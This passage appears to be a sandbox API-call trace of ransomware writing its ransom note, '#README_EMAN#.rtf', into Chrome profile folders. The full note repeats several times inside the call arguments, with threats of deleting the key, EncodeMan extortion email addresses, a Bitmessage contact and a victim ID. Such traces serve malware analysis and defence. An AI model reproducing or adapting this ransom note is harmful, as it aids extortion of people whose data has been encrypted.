w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nLp¬\x9d}67È\x90U«Ôg^úò\x1f$kZ\x02Ã`\x03^", lpUsedDefaultChar=0x0) returned 8717 [0289.665] WriteFile (in: hFile=0x2f0, lpBuffer=0x24647a8*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x24647a8*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0289.665] CloseHandle (hObject=0x2f0) returned 1 [0289.665] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\IndexedDB\\https_www.google.com_0.indexeddb.leveldb\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\indexeddb\\https_www.google.com_0.indexeddb.leveldb\\#readme_eman#.rtf")) returned 0xffffffff [0289.666] GetLastError () returned 0x2 [0289.666] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\IndexedDB\\https_www.google.com_0.indexeddb.leveldb\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\indexeddb\\https_www.google.com_0.indexeddb.leveldb\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2f0 [0289.666] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0289.666] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0289.666] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in 